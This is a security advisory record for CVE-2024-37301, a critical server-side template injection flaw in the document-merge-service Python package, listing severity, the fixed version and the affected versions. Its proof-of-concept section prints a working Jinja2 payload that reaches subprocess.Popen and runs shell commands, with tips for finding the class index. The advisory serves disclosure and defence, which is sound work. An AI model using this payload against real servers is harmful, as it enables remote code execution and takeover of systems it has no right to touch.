GHSA-v5gf-r78h-55q6

Source

https://github.com/advisories/GHSA-v5gf-r78h-55q6

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-v5gf-r78h-55q6/GHSA-v5gf-r78h-55q6.json

JSON Data

https://api.test.osv.dev/v1/vulns/GHSA-v5gf-r78h-55q6

Aliases

CVE-2024-37301

Published

2024-06-11T20:22:55Z

Modified

2024-10-16T17:21:53.936882Z

Severity

9.1 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H CVSS Calculator

Summary

document-merge-service vulnerable to Remote Code Execution via Server-Side Template Injection

Details

Impact

A remote code execution (RCE) via server-side template injection (SSTI) allows for user supplied code to be executed in the server's context where it is executed as the document-merge-server user with the UID 901 thus giving an attacker considerable control over the container.

Patches

It has been patched in v6.5.2

References

https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/jinja2-ssti

POC

Add the following to a document, upload and render it:

{% if PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202] %} 
ls -a: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("ls -a", shell=True, stdout=-1).communicate()[0].strip() }}

whoami: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("whoami", shell=True, stdout=-1).communicate()[0].strip() }}

uname -a:
{{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("uname -a", shell=True, stdout=-1).communicate()[0].strip() }}

{% endif %}

The index might be different, so to debug this first render a template with {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__() }} and then get the index of subprocess.Popen and replace 202 with that.

Database specific

{
    "nvd_published_at": "2024-06-11T19:16:07Z",
    "cwe_ids": [
        "CWE-1336"
    ],
    "severity": "CRITICAL",
    "github_reviewed": true,
    "github_reviewed_at": "2024-06-11T20:22:55Z"
}

References

Affected packages

PyPI / document-merge-service

Package

Name: document-merge-service; View open source insights on deps.dev
Purl: pkg:pypi/document-merge-service

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

6.5.2

Affected versions

5.*

5.2.0

5.2.1

6.*

6.0.0

6.1.0

6.1.1

6.1.2

6.2.0

6.2.1

6.2.2

6.3.0

6.3.1

6.4.0

6.4.1

6.4.2

6.4.3

6.4.4

6.4.5

6.4.6

6.5.0

6.5.1